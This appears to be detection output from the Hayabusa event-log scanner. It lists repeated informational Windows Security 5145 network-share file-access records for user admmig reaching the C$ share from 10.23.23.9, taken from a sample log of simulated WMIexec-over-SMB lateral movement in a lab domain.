10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a#\a5c640ad1645775e93d560f67f3ea1d1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e#\865873dc1b8af370b7a314c3c89dcfd0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168#\9d5a241e9cf3bdb8312058004ea269f4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\68828aa1ea98316a22a4d8488267b07b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b#\7cb1fc2895121ae7e24841bd0c24b25e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656#\e1349161320cee221fb339c41ab73546 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83#\59420f153f7bb0ef6f63e75d08020c8c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\433ad5082c48708eb6acf6fa065c1461 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5#\87b325b56b362a5d2dca93029c0d75b8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786#\8078dc8e65f16bfd95c09cce4fe0280e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611#\54330dabd4f5e29c758461cbbf2a4f34 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1#\50399e243bf8da1addc23305521efbd9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe#\174cd66357bfa0b262b0dbd9bd0e64e3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce#\f05e09fe4c0d9354867afe11b4e9db8c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.811 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\89e812888a4e94f1d2bf0da1c4c6ee5b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb#\f3228ac51b37737ae2ce1176bbbad2ce : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136#\cabc62ca2a04f99fe9af65799a727687 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\1617c5f47d154a5d7cf1f53851398006 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\19b334bb62b3c76cfcc7137bb03371c3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b#\822ee6a8aa9386352052b7bd2610f3b5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62#\ab00f4aa6892c4c6d39b87f078e8208f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b#\93b57911ae369118b40a5605c448eb9d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777#\b090c87f42b1af785a6a9d1c43c201c6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c#\c59f97903ad4de423586f3a75eb8939d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04#\f6f9e39cc765b7ceda89fc7893e0f74c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749#\7ddbc8b883fb594b4efd9f4b016a4657 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0#\54486a01e573ae88df2c9fc21771e5ef : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0#\29e4fb69d6e2ff119c3e89fe9f23ea71 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.873 